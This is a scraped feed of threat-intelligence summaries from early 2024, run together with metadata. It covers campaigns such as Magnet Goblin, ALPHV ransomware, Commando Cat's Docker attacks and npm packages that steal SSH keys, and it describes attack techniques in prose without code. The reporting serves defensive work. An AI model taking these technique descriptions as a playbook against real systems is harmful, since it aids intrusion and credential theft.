www.secnews.physaphae.fr/article.php?IdArticle=8462305 False Malware None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-03-11T13:43:18+00:00 https://community.riskiq.com/article/0d210725 www.secnews.physaphae.fr/article.php?IdArticle=8462154 False Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Cloud None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Check Point reports Magnet Goblin is a financially motivated threat actor that quickly adopts and leverages 1-day vulnerabilities in public-facing services as an initial infection vector. At least in one case of Ivanti Connect Secure VPN (CVE-2024-21887), the exploit entered the group\'s arsenal as fast as within 1 day after a POC for it was published. The group has targeted Ivanti, Magento, Qlink Sense, and possibly Apache ActiveMQ. Analysis of the actor\'s recent Ivanti Connect Secure VPN campaign revealed a novel Linux version of a malware called NerbianRAT, in addition to WARPWIRE, a JavaScript credential stealer. The actor\'s arsenal also includes MiniNerbian, a small Linux backdoor, and remote monitoring and management (RMM) tools for Windows like ScreenConnect and AnyDesk. #### Reference URL(s) 1. https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/ #### Publication Date March 8, 2024 #### Author(s) Check Point ]]> 2024-03-08T17:30:16+00:00 https://community.riskiq.com/article/11616c16 www.secnews.physaphae.fr/article.php?IdArticle=8460926 False Malware,Tool,Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Trend Micro MDR team investigated and successfully uncovered the intrusion sets employed by Earth Kapre in a recent incident. The espionage group Earth Kapre (aka RedCurl and Red Wolf) has been actively conducting phishing campaigns targeting organizations in Russia, Germany, Ukraine, the United Kingdom, Slovenia, Canada, Australia, and the US. It uses phishing emails that contain malicious attachments (.iso and .img), which lead to successful infections upon opening. This triggers the creation of a scheduled task for persistence, alongside the unauthorized collection and transmission of sensitive data to command-and-control (C&C) servers. #### Reference URL(s) 1. https://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html #### Publication Date March 7, 2024 #### Author(s) Buddy Tancio Maria Emreen Viray Mohamed Fahmy ]]> 2024-03-07T21:48:42+00:00 https://community.riskiq.com/article/d2d46a48 www.secnews.physaphae.fr/article.php?IdArticle=8460528 False None None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Cado Security Labs researchers have recently encountered an emerging malware campaign targeting misconfigured servers running web-facing services. The campaign utilises a number of unique and unreported payloads, including four Golang binaries, that serve as tools to automate the discovery and infection of hosts running the above services. The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and exploiting an n-day vulnerability, to conduct Remote Code Execution (RCE) attacks and infect new hosts. Once initial access is achieved, a series of shell scripts and general Linux attack techniques are used to deliver a cryptocurrency miner, spawn a reverse shell and enable persistent access to the compromised hosts. #### Reference URL(s) 1. https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/ #### Publication Date March 6, 2024 #### Author(s) Matt Muir ]]> 2024-03-06T21:12:22+00:00 https://community.riskiq.com/article/68797fe5 www.secnews.physaphae.fr/article.php?IdArticle=8460028 False Malware,Tool,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Security researchers from Lookout recently uncovered a sophisticated phishing kit, known as CryptoChameleon, utilizing novel techniques to steal sensitive data from cryptocurrency platforms and the Federal Communications Commission (FCC). This kit employs custom single sign-on (SSO) pages and phone/SMS lures to extract login credentials, multi-factor tokens, and photo IDs from victims, primarily on mobile devices. Notably, the kit includes an administrative console to monitor phishing attempts and offers customized redirections based on victims\' responses, with an emphasis on mimicking authentic MFA processes. Attacks have successfully compromised hundreds of victims, primarily in the United States. While tactics resemble previous actors like [Scattered Spider AKA Octo Tempest](https://ti.defender.microsoft.com/intel-profiles/205381037ed05d275251862061dd923309ac9ecdc2a9951d7c344d890a61101a), infrastructure differences suggest a distinctly different threat group. #### Reference URL(s) 1. https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit #### Publication Date February 29, 2024 #### Author(s) David Richardson Savio Lau]]> 2024-03-06T14:38:08+00:00 https://community.riskiq.com/article/9227be0c www.secnews.physaphae.fr/article.php?IdArticle=8459878 False Threat,Mobile None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-03-06T01:05:06+00:00 https://community.riskiq.com/article/1fe95f7f www.secnews.physaphae.fr/article.php?IdArticle=8459610 False Ransomware,Spam,Malware,Tool,Threat,Legislation,Medical None 4.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Cisco Talos observed a surge in GhostSec, a hacking group\'s malicious activities since this past year. GhostSec, a financially motivated hacking group, has been observed conducting double extortion ransomware attacks on various business verticals in multiple countries. The group has evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware. GhostSec and Stormous ransomware groups are jointly conducting these attacks and have started a new ransomware-as-a-service (RaaS) program STMX_GhostLocker, providing various options for their affiliates. GhostSec and Stormous ransomware groups have jointly conducted double extortion ransomware attacks targeting victims across various business verticals in multiple countries. Talos also discovered two new tools in GhostSec\'s arsenal, the "GhostSec Deep Scan tool" and "GhostPresser," both likely being used in the attacks against websites GhostSec has remained active since last year and has conducted several denial-of-service (DoS) attacks and has taken down victims\' websites. #### Reference URL(s) 1. https://blog.talosintelligence.com/ghostsec-ghostlocker2-ransomware/ #### Publication Date March 5, 2024 #### Author(s) Chetan Raghuprasad ]]> 2024-03-05T20:46:20+00:00 https://community.riskiq.com/article/ee5a4e56 www.secnews.physaphae.fr/article.php?IdArticle=8459509 False Ransomware,Tool None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-03-05T19:03:47+00:00 https://community.riskiq.com/article/ed40fbef www.secnews.physaphae.fr/article.php?IdArticle=8459485 False Ransomware,Malware,Tool,Vulnerability,Threat,Studies,Medical,Technical ChatGPT,APT 28,APT 4 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description A new wave of SocGholish malware infections has been identified, targeting WordPress websites. The malware campaign leverages a JavaScript malware framework that has been in use since at least 2017. The malware attempts to trick unsuspecting users into downloading what is actually a Remote Access Trojan (RAT) onto their computers, which is often the first stage in a ransomware infection. The infected sites were compromised through hacked wp-admin administrator accounts. #### Reference URL(s) 1. https://blog.sucuri.net/2024/03/new-wave-of-socgholish-infections-impersonates-wordpress-plugins.html #### Publication Date March 1, 2024 #### Author(s) Ben Martin ]]> 2024-03-04T20:21:51+00:00 https://community.riskiq.com/article/0218512b www.secnews.physaphae.fr/article.php?IdArticle=8459000 False Ransomware,Malware None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Recorded Future\'s Insikt Group has discovered new infrastructure related to the operators of Predator, a mercenary mobile spyware. The infrastructure is believed to be in use in at least eleven countries, including Angola, Armenia, Botswana, Egypt, Indonesia, Kazakhstan, Mongolia, Oman, the Philippines, Saudi Arabia, and Trinidad and Tobago. Despite being marketed for counterterrorism and law enforcement, Predator is often used against civil society, targeting journalists, politicians, and activists. The use of spyware like Predator poses significant risks to privacy, legality, and physical safety, especially when used outside serious crime and counterterrorism contexts. The Insikt Group\'s research identified a new multi-tiered Predator delivery infrastructure, with evidence from domain analysis and network intelligence data. Despite public disclosures in September 2023, Predator\'s operators have continued their operations with minimal changes. Predator, alongside NSO Group\'s Pegasus, remains a leading provider of mercenary spyware, with consistent tactics, techniques, and procedures over time. As the mercenary spyware market expands, the risks extend beyond civil society to anyone of interest to entities with access to these tools. Innovations in this field are likely to lead to more stealthy and comprehensive spyware capabilities. #### Reference URL(s) 1. https://www.recordedfuture.com/predator-spyware-operators-rebuild-multi-tier-infrastructure-target-mobile-devices #### Publication Date March 1, 2024 #### Author(s) Insikt Group]]> 2024-03-01T20:49:50+00:00 https://community.riskiq.com/article/7287eb1b www.secnews.physaphae.fr/article.php?IdArticle=8457691 False Tool,Mobile,Technical None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. Phobos ransomware operates in conjunction with various open source tools such as Smokeloader, Cobalt Strike, and Bloodhound. These tools are all widely accessible and easy to use in various operating environments, making it (and associated variants) a popular choice for many threat actors. #### Reference URL(s) 1. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a #### Publication Date February 26, 2024 #### Author(s) CISA ]]> 2024-02-29T20:16:44+00:00 https://community.riskiq.com/article/ad1bfcb4 www.secnews.physaphae.fr/article.php?IdArticle=8457173 False Ransomware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as February 2024. This advisory provides updates to the FBI FLASH BlackCat/ALPHV Ransomware Indicators of Compromise released April 19, 2022, and to this advisory released December 19, 2023. ALPHV Blackcat actors have since employed improvised communication methods by creating victim-specific emails to notify of the initial compromise. Since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most commonly victimized. This is likely in response to the ALPHV Blackcat administrator\'s post encouraging its affiliates to target hospitals after operational action against the group and its infrastructure in early December 2023.. In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update, which was rewritten to provide additional features to affiliates, such as better defense evasion and additional tooling. This ALPHV Blackcat update has the capability to encrypt both Windows and Linux devices, and VMWare instances. ALPHV Blackcat affiliates have extensive networks and experience with ransomware and data extortion operations. According to the FBI, as of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities-nearly 75 percent of which are in the United States and approximately 250 outside the United States-, demanded over $500 million, and received nearly $300 million in ransom payments. #### Reference URL(s) 1. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a #### Publication Date December 19, 2023 #### Author(s) CISA ]]> 2024-02-28T18:15:21+00:00 https://community.riskiq.com/article/b85e83eb www.secnews.physaphae.fr/article.php?IdArticle=8456579 False Ransomware None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Despite being first submitted to a publicly available file scanning service in July 2023, the earliest variant of the Abyss Locker ransomware may have originated even earlier due to its foundation on the HelloKitty ransomware source code. In early January 2024, researchers uncovered a version 1 variant targeting Windows systems, followed by a subsequent version 2 release later that month. The Abyss Locker threat actor adopts a strategy of exfiltrating victims\' data before deploying the ransomware for file encryption, with additional capabilities including the deletion of Volume Shadow Copies and system backups. Additionally, a Linux variant of Abyss Locker has been observed, which employs different tactics such as targeting virtual machines and encrypting files with a ".crypt" extension. #### Reference URL(s) 1. https://www.fortinet.com/blog/threat-research/ransomware-roundup-abyss-locker #### Publication Date February 26, 2024 #### Author(s) Shunichi Imano Fred Gutierrez ]]> 2024-02-27T22:38:36+00:00 https://community.riskiq.com/article/fc80abff www.secnews.physaphae.fr/article.php?IdArticle=8456118 False Ransomware,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Talos has observed a phishing spam campaign targeting potential victims in Mexico, luring users to download a new obfuscated information stealer Talos is calling TimbreStealer, which has been active since at least November 2023. It contains several embedded modules used for orchestration, decryption and protection of the malware binary. This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques and procedures (TTPs) to distribute a banking trojan known as “Mispadu.” #### Reference URL(s) 1. https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/ #### Publication Date February 27, 2024 #### Author(s) Guilherme Venere Jacob Finn Tucker Favreau Jacob Stanfill James Nutland ]]> 2024-02-27T20:31:31+00:00 https://community.riskiq.com/article/b61544ba www.secnews.physaphae.fr/article.php?IdArticle=8456070 False Spam,Malware,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description AhnLab Security Intelligence Center (ASEC) has discovered that Nood RAT, a variant of Gh0st RAT that works in Linux, is being used in malware attacks. Nood RAT is a backdoor malware that can receive commands from the C&C server to perform malicious activities such as downloading malicious files, stealing systems\' internal files, and executing commands. Although simple in form, it is equipped with an encryption feature to avoid network packet detection. Nood RAT is developed using a builder that allows the threat actor to create x86 or x64 binary based on the architecture and choose and use the binary that fits the target system. The malware has a feature that changes its name in order to disguise itself as a legitimate program. The threat actor is able to decide the malware\'s fake process name during the development stage. #### Reference URL(s) 1. https://asec.ahnlab.com/en/62144/ #### Publication Date February 25, 2024 #### Author(s) Sanseo ]]> 2024-02-26T20:46:17+00:00 https://community.riskiq.com/article/cc509147 www.secnews.physaphae.fr/article.php?IdArticle=8455566 False Malware,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Since September 2023, Cisco Talos have observed a significant increase in the volume of malicious emails leveraging the Google Cloud Run service to infect potential victims with banking trojans. The infection chains associated with these malware families feature the use of malicious Microsoft Installers (MSIs) that function as droppers or downloaders for the final malware payload(s). The distribution campaigns for these malware families are related, with Astaroth and Mekotio being distributed under the same Google Cloud Project and Google Cloud storage bucket. Ousaban is also being dropped as part of the Astaroth infection process. The malware is being distributed via emails that are being sent using themes related to invoices or financial and tax documents, and sometimes pose as being sent from the local government tax agency in the country being targeted. The emails contain hyperlinks to Google Cloud Run, which can be identified due to the use of run[.]app as the top-level domain (TLD). When victims access these hyperlinks, they are redirected to the Cloud Run web services deployed by the threat actors and delivered the components necessary to initiate the infection process. #### Reference URL(s) 1. https://blog.talosintelligence.com/google-cloud-run-abuse/ #### Publication Date February 20, 2024 #### Author(s) Edmund Brumaghin Ashley Shen Holger Unterbrink Guilherme Venere ]]> 2024-02-23T20:51:22+00:00 https://community.riskiq.com/article/93dd0003 www.secnews.physaphae.fr/article.php?IdArticle=8454281 False Malware,Threat,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Cisco Talos, in collaboration with CERT.NGO, has discovered new malicious components used by the Turla APT. Talos illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. They found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest. Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems. #### Reference URL(s) 1. https://blog.talosintelligence.com/tinyturla-next-generation/ 2. https://blog.talosintelligence.com/tinyturla-ng-tooling-and-c2/ #### Publication Date February 22, 2024 #### Author(s) Asheer Malhotra Holger Unterbrink Arnaud Zobec Vitor Ventura ]]> 2024-02-22T18:15:27+00:00 https://community.riskiq.com/article/35e2037c www.secnews.physaphae.fr/article.php?IdArticle=8453804 False None None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Alpha, a new ransomware that first appeared in February 2023 has intensified its activities in recent weeks and strongly resembles the now defunct NetWalker ransomware that vanished in January 2021. Analysis of Alpha reveals significant parallels with NetWalker, including the use of a similar PowerShell-based loader and code overlap. While Alpha initially remained low-profile after its appearance in February 2023, recent attacks indicate a surge in operations, including the deployment of a data leak site and the utilization of living-off-the-land tools like Taskkill and PsExec. The similarities between Alpha and NetWalker suggest a potential revival of the old ransomware operation by original developers or the acquisition and modification of the NetWalker payload by new attackers. #### Reference URL(s) 1. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/alpha-netwalker-ransomware 2. https://gbhackers.com/alpha-ransomware-living-off-the-land/ #### Publication Date February 16, 2024 #### Author(s) Symantec Threat Hunter Team]]> 2024-02-20T21:35:38+00:00 https://community.riskiq.com/article/507ee0d6 www.secnews.physaphae.fr/article.php?IdArticle=8452902 False Ransomware,Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description SentinelOne researchers have discovered a new Python script called SNS Sender that uses AWS Simple Notification Service (SNS) to send bulk SMS messages for the purpose of spamming phishing links, also known as Smishing. This is the first script observed using AWS SNS, and it is believed that the actor behind this tool is using cloud services to send bulk SMS phishing messages. The script author is known by the alias ARDUINO_DAS and is prolific in the phish kit scene. The script requires a list of phishing links named links.txt in its working directory. SNS Sender also takes several arguments that are entered as input: a text file containing a list of AWS access keys, secrets, and region delimited by a colon; a text file containing a list of phone numbers to target; a sender ID, similar to a display name for a message; and the message content. The script replaces any occurrences of the string in the message content variable with a URL from the links.txt file, which weaponizes the message as a phishing SMS. The actor behind this tool has been linked to many phishing kits used to target victims\' personally identifiable information (PII) and payment card details under the guise of a message from the United States Postal Service (USPS) regarding a missed package delivery. #### Reference URL(s) 1. https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/ #### Publication Date February 15, 2024 #### Author(s) Alex Delamotte ]]> 2024-02-16T20:41:12+00:00 https://community.riskiq.com/article/262fc193 www.secnews.physaphae.fr/article.php?IdArticle=8451105 False Spam,Tool,Cloud None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description A new banking Trojan named "Coyote" has been discovered, targeting users of over 60 banking institutions primarily in Brazil. It utilizes advanced techniques such as Squirrel installer, NodeJS, and Nim programming language to infect victims, diverging from traditional methods. The malware hides its loader within an update packager, then employs NodeJS to execute obfuscated JavaScript code and loads the final stage using Nim. Coyote persists by abusing Windows logon scripts and monitors banking applications for sensitive information, communicating with its command and control server via SSL channels. The Trojan\'s complexity signifies a shift towards modern technologies among cybercriminals, reflecting an increasing sophistication in the threat landscape. #### Reference URL(s) 1. https://securelist.com/coyote-multi-stage-banking-trojan/111846/ #### Publication Date February 8, 2024 #### Author(s) Global Research & Analysis Team Kaspersky Lab ]]> 2024-02-16T19:33:28+00:00 https://community.riskiq.com/article/4643beae www.secnews.physaphae.fr/article.php?IdArticle=8451083 False Malware,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Proofpoint researchers have been monitoring an ongoing cloud account takeover campaign impacting dozens of Microsoft Azure environments and compromising hundreds of user accounts, including senior executives. The attack integrates credential phishing and cloud account takeover (ATO) techniques. Threat actors target users with individualized phishing lures within shared documents. The varied selection of targeted roles indicates a practical strategy by threat actors, aiming to compromise accounts with various levels of access to valuable resources and responsibilities across organizational functions. Successful initial access often leads to a sequence of unauthorized post-compromise activities, including MFA manipulation, data exfiltration, internal and external phishing, financial fraud, and mailbox rules. The use of a specific Linux user-agent utilized by attackers during the access phase of the attack chain is one of the IOCs. Attackers predominantly utilize this user-agent to access the \'OfficeHome\' sign-in application along with unauthorized access to additional native Microsoft365 apps. #### Reference URL(s) 1. https://www.proofpoint.com/us/blog/cloud-security/community-alert-ongoing-malicious-campaign-impacting-azure-cloud-environments #### Publication Date February 7, 2024 #### Author(s) Proofpoint Cloud Security Response Team ]]> 2024-02-15T19:44:52+00:00 https://community.riskiq.com/article/0e03c855 www.secnews.physaphae.fr/article.php?IdArticle=8450550 False Threat,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Proofpoint researchers discovered the return of the Bumblebee malware on February 8, 2024, marking its reappearance after four months of absence from their threat data. Bumblebee, a sophisticated downloader utilized by various cybercriminal groups, resurfaced in a campaign targeting US organizations through emails with OneDrive URLs containing Word files posing as voicemail messages from "info@quarlesaa[.]com". These Word documents, impersonating the electronics company Humane, utilized macros to execute scripts and download malicious payloads from remote servers. The attack chain, notably employing VBA macro-enabled documents, contrasts with recent trends in cyber threats, where such macros were less commonly used. Despite the absence of attribution to a specific threat actor, Proofpoint warns of Bumblebee\'s potential as an initial access point for subsequent ransomware attacks. The resurgence of Bumblebee aligns with a broader trend of increased cybercriminal activity observed in 2024, marked by the return of several threat actors and malware strains after prolonged periods of dormancy, indicating a surge in cyber threats following a temporary decline. #### Reference URL(s) 1. https://www.proofpoint.com/us/blog/threat-insight/bumblebee-buzzes-back-black #### Publication Date February 12, 2024 #### Author(s) Axel F Selena Larson Proofpoint Threat Research Team ]]> 2024-02-15T18:48:58+00:00 https://community.riskiq.com/article/ab2bde0b www.secnews.physaphae.fr/article.php?IdArticle=8450534 False Ransomware,Malware,Threat,Prediction None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Cado researchers have discovered a new malware campaign called "Commando Cat" that targets exposed Docker API endpoints. The campaign is a cryptojacking campaign that leverages Docker as an initial access vector and mounts the host\'s filesystem before running a series of interdependent payloads directly on the host. The payloads are delivered to exposed Docker API instances over the internet. The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat project "generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command." It is likely used by the attacker to seem like a benign tool and not arouse suspicion. The attacker then creates the container with a custom command to execute. The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password. The tshd.sh script is responsible for deploying TinyShell (tsh), an open-source Unix backdoor written in C. The gsc.sh script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. The aws.sh script is a credential grabber that pulls credentials from a number of files on disk, as well as IMDS, and environment variables. The final payload is delivered as a base64 encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash. #### Reference URL(s) 1. https://www.cadosecurity.com/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker/ #### Publication Date February 1, 2024 #### Author(s) Nate Bill Matt Muir ]]> 2024-02-08T20:42:07+00:00 https://community.riskiq.com/article/1ae69360 www.secnews.physaphae.fr/article.php?IdArticle=8448153 False Malware,Tool None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Ivanti VPN appliances have been exploited through two critical vulnerabilities, CVE-2023-46805 and CVE-2024-21887, which were not patched at the time of disclosure. These vulnerabilities allow unauthorized command execution and system access on Internet-facing security devices, compromising the integrity of secure VPN tunnels and exposing private internal networks to potential espionage and data theft. Attackers exploited these vulnerabilities to modify legitimate Ivanti Connect Secure components, backdooring the compcheckresult.cgi file to enable remote command execution and altering JavaScript files within the Web SSL VPN component to capture and exfiltrate user login credentials. The additional vulnerabilities disclosed by Ivanti on January 31st, CVE-2024-21888 and CVE-2024-21893, also allow for unauthenticated remote command execution with elevated privileges, increasing the attack surface for malicious actors. The impact of these vulnerabilities is profound, enabling attackers to bypass multi-factor authentication, steal confidential information, establish covert command and control channels, and potentially disrupt critical operations. Attribution analysis by Mandiant indicates that these vulnerabiliti]]> 2024-02-07T21:04:11+00:00 https://community.riskiq.com/article/903e3f3c www.secnews.physaphae.fr/article.php?IdArticle=8447805 False Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description NCC Group has observed what they believe to be the attempted exploitation of CVE-2021-42278 and CVE-2021-42287 as a means of privilege escalation, following the successful compromise of an Ivanti Secure Connect VPN using the zero-day vulnerabilities CVE-2023-46805 and CVE-2024-21887. #### Reference URL(s) 1. https://research.nccgroup.com/2024/02/05/ivanti-zero-day-threat-actors-observed-leveraging-cve-2021-42278-and-cve-2021-42287-for-quick-privilege-escalation-to-domain-admin/ #### Publication Date February 5, 2024 #### Author(s) David Brown Mungomba Mulenga ]]> 2024-02-06T20:20:15+00:00 https://community.riskiq.com/article/0f5ea97b www.secnews.physaphae.fr/article.php?IdArticle=8447414 False Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description ESET researchers have discovered a new cyber espionage campaign that uses twelve Android apps carrying VajraSpy, a remote access trojan (RAT) used by the Patchwork APT group. Six of the apps were available on Google Play, and six were found on VirusTotal. The apps were advertised as messaging tools, and one posed as a news app. VajraSpy has a range of espionage functionalities that can be expanded based on the permissions granted to the app bundled with its code. It steals contacts, files, call logs, and SMS messages, but some of its implementations can even extract WhatsApp and Signal messages, record phone calls, and take pictures with the camera. The campaign targeted users mostly in Pakistan, and the threat actors likely used targeted honey-trap romance scams to lure their victims into installing the malware. #### Reference URL(s) 1. https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/ #### Publication Date February 1, 2024 #### Author(s) Lukas Stefanko ]]> 2024-02-05T21:31:30+00:00 https://community.riskiq.com/article/b8134bfa www.secnews.physaphae.fr/article.php?IdArticle=8447349 False Malware,Tool,Threat,Mobile None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description The Akamai Security Intelligence Group (SIG) has uncovered details about a new variant of the FritzFrog botnet, which abuses the 2021 Log4Shell vulnerability. The malware infects internet-facing servers by brute forcing weak SSH credentials. Newer variants now read several system files on compromised hosts to detect potential targets for this attack that have a high likelihood of being vulnerable. The malware also now also includes a module to exploit CVE-2021-4034, a privilege escalation in the polkit Linux component. This module enables the malware to run as root on vulnerable servers. #### Reference URL(s) 1. https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell #### Publication Date February 2, 2024 #### Author(s) Ori David ]]> 2024-02-02T20:03:16+00:00 https://community.riskiq.com/article/1fe06690 www.secnews.physaphae.fr/article.php?IdArticle=8446120 False Malware,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description AhnLab Security Intelligence Center (ASEC) has identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. The attack targets MS-SQL servers and exploits the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process. The attacker also attempted to use malware for port forwarding to establish an RDP connection to the infected system and control it remotely. The Trigona threat actor is known to use Mimikatz to steal account credentials. The threat actor installed AnyDesk to control the infected system. Administrators must use passwords that cannot be easily guessed and change them periodically to protect the database servers from brute force and dictionary attacks. V3 must also be updated to the latest version to block malware infection in advance. Administrators should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors. #### Reference URL(s) 1. https://asec.ahnlab.com/en/61000/ #### Publication Date January 29, 2024 #### Author(s) Sanseo ]]> 2024-02-01T21:40:33+00:00 https://community.riskiq.com/article/f3fb7f61 www.secnews.physaphae.fr/article.php?IdArticle=8445735 False Ransomware,Malware,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description ESET has worked with the Federal Police of Brazil on an effort to disrupt the Grandoreiro botnet, providing technical analysis, statistical information and known C&C servers to the authorities. Grandoreiro is a Latin American banking trojan that has been active since at least 2017 and targets Brazil, Mexico, and Spain. Grandoreiro\'s operators have abused cloud providers such as Azure and AWS to host their network infrastructure. #### Reference URL(s) 1. https://www.welivesecurity.com/en/eset-research/eset-takes-part-global-operation-disrupt-grandoreiro-banking-trojan/ #### Publication Date January 30, 2024 #### Author(s) ESET Research ]]> 2024-01-31T21:23:24+00:00 https://community.riskiq.com/article/5af9ede2 www.secnews.physaphae.fr/article.php?IdArticle=8445334 False Cloud,Technical None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description The Kimsuky threat group, deemed to be supported by North Korea, has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014. Cases of attacks against countries other than South Korea have also been identified since 2017. The group usually employs spear phishing attacks against the national defense sector, defense industries, the press, the diplomatic sector, national organizations, and academic fields to steal internal information and technology from organizations. Even until recently, the Kimsuky group was still mainly employing spear phishing attacks to gain initial access. What makes the recent attacks different from the previous cases is that more LNK shortcut-type malware are being used instead of malware in Hangul Word Processor (HWP) or MS Office document format. The threat actor led users to download a compressed file through attachments or download links within spear phishing emails. When this compressed file is decompressed, it yields a legitimate document file along with a malicious LNK file. #### Reference URL(s) 1. https://asec.ahnlab.com/en/59590/ #### Publication Date December 7, 2023 #### Author(s) Sanseo ]]> 2024-01-30T21:43:14+00:00 https://community.riskiq.com/article/806c1abf www.secnews.physaphae.fr/article.php?IdArticle=8444953 False Malware,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description ReversingLabs researchers have discovered two malicious packages on the npm open source package manager that leverages GitHub to store stolen Base64-encrypted SSH keys lifted from developer systems that installed the malicious npm packages. The packages, warbeast2000 and kodiak2k, were identified in January and have since been removed from npm. The warbeast2000 package was downloaded a little less than 400 times, whereas the kodiak2k was downloaded around 950 times. The malicious actors behind the packages used GitHub to store the stolen information. The warbeast2000 package contained just a few components and was still under development when it was detected. The package would launch a postinstall script that fetched and executed a javascript file. This second stage malicious script read the private ssh key stored in the id_rsa file located in the /.ssh directory. It then uploaded the Base64 encoded key to an attacker-controlled GitHub repository. The kodiak2k package had more than 30 different versions and, apart from the first few, all of them were malicious. The package also executed a script found in an archived GitHub project containing the Empire post-exploitation framework. The script also invokes the Mimikatz hacking tool, which is commonly used to dump credentials from process memory. #### Reference URL(s) 1. https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data #### Publication Date January 23, 2024 #### Author(s) Lucija Valentić ]]> 2024-01-30T19:59:14+00:00 https://community.riskiq.com/article/d8ec25d3 www.secnews.physaphae.fr/article.php?IdArticle=8444918 False Tool,Threat None 4.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description A financially-motivated threat actor has been targeting Mexican banks and cryptocurrency trading entities with a modified version of AllaKore RAT. Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process. The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud. #### Reference URL(s) 1. https://blogs.blackberry.com/en/2024/01/mexican-banks-and-cryptocurrency-platforms-targeted-with-allakore-rat #### Publication Date January 29, 2024 #### Author(s) BlackBerry Research & Intelligence Team ]]> 2024-01-29T20:40:12+00:00 https://community.riskiq.com/article/98ad6319 www.secnews.physaphae.fr/article.php?IdArticle=8444546 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description ESET researchers uncover NSPX30, a sophisticated implant used by a new China-aligned APT group they have named Blackwood. NSPX30 is a sophisticated implant delivered through adversary-in-the-middle 